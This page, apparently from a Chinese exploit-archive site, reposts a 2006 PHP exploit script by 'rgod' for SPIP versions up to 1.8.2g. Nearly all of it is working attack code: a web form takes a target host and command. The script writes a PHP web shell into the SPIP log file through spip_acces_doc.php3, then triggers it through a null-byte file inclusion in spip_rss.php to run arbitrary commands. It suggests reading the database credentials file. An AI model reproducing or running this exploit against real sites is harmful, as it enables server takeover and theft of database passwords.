首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SPIP <= 1.8.2-g spip_log and include_local Remote Code Execution Exploit
来源:http://retrogod.altervista.org 作者:rgod 发布时间:2006-02-09  

SPIP <= 1.8.2-g "spip_log" and "include_local" Remote Code Execution Exploit


<?php
# ---spip_182g_shell_inj_xpl.php 17.33 08/02/2006
#
# SPIP <= 1.8.2g remote commands execution
# coded by rgod
# site: http://retrogod.altervista.org
#
# -> this works regardless of magic_quotes_gpc settings
# usage: launch from Apache, fill in requested fields, then go!
#
# Sun-Tzu: "Fighting with a large army under your command is nowise different
# from fighting with a small one: it is merely a question of instituting
# signs and signals."

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 5);
ob_implicit_flush (1);

echo'<html><head><title>*******SPIP 1.8.2g remote commands execution************
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
*******SPIP 1.8.2g remote commands execution************</p><p class="Stile6">a
script by rgod at <a href="http://retrogod.altervista.org"target="_blank">
http://retrogod.altervista.org</a></p><table width="84%"><tr><td width="43%">
<form name="form1" method="post" action="'.$_SERVER[PHP_SELF].'"> <p><input
type="text" name="host"> <span class="Stile5"> * hostname (ex:www.sitename.com)
</span></p> <p><input type="text" name="path"> <span class="Stile5">* path (ex:
/spip/ or just / ) </span></p><p><input type="text" name="cmd"> <span
class="Stile5">* specify a command ("cat ./ecrire/inc_connect.php3" to see data
base username & password)</span></p><p><input type="text" name="port"> <span
class="Stile5">specify a port other than 80 (default value)</span></p><p><input
type="text" name="proxy"><span class="Stile5">send exploit through an HTTP proxy
(ip:port)</span></p><p><input type="submit" name="Submit" value="go!"> </p>
</form></td></tr></table></body></html>';

function show($headeri)
{
$ii=0;$ji=0;$ki=0;$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1){
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>  </td>";
for ($li=0; $li<=15; $li++) {
echo "<td>".htmlentities($headeri[$li+$ki])."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {
echo "<td>0".htmlentities($datai)."</td>";
}
else {
echo "<td>".htmlentities($datai)."</td> ";
}
$ii++;$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {
echo "<td>  </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++) {
echo "<td>".htmlentities($headeri[$li])."</td>";
}
echo "</tr></table>";
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket() //2x speed
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='') {
$result = socket_connect($socket, $host, $port);
}
else {
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else {
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}

function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.htmlentities($host); die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);echo nl2br(htmlentities($html));
}

$host=$_POST[host];$port=$_POST[port];
$path=$_POST[path];$proxy=$_POST[proxy];
$cmd=$_POST[cmd];$cmd=urlencode($cmd);
echo "<span class=\"Stile5\">";
if (($host<>'') and ($path<>'') and ($cmd<>''))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);

#STEP 1 -> Inject a shell in log file (ecrire/data/spip.log)
$SHELL="<?php ob_clean();echo\"Hi Master!\r\n\";ini_set(\"max_execution_time\",0);
passthru(\$_GET[SUNTZU]);die();?>";
$SHELL=urlencode($SHELL);
$packet="GET ".$p."spip_acces_doc.php3?id_document=0&file=".$SHELL." HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: GoogleBot 1.1 or \"Sun-Tzu\" giving you the death\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);

#STEP 2 -> Arbitrary local inclusion, launch commands...
$packet="GET ".$p."spip_rss.php?GLOBALS[type_urls]=/../ecrire/data/spip.log%00&SUNTZU=".$cmd." HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: NetAnts/1.2x\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi("Hi Master!",$html)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
}
else
{echo "Fill * required fields, optionally specify a proxy...";}
echo "</span>";
?>




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mozilla Firefox location.Query
·Local root exploit for QNX Neu
·Eudora Qualcomm WorldMail IMAP
·Half-Life engine remote DoS ex
·MyQuiz version 1.01 remote com
·CPGNuke Dragonfly 9.0.6.1 remo
·Proof of concept exploit that
·Local root exploit for QNX Neu
·SQL Injection Exploit for ASPT
·Invision Power Board Army Syst
·Qualcomm WorldMail IMAP Server
·Microsoft HTML Help Workshop .
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved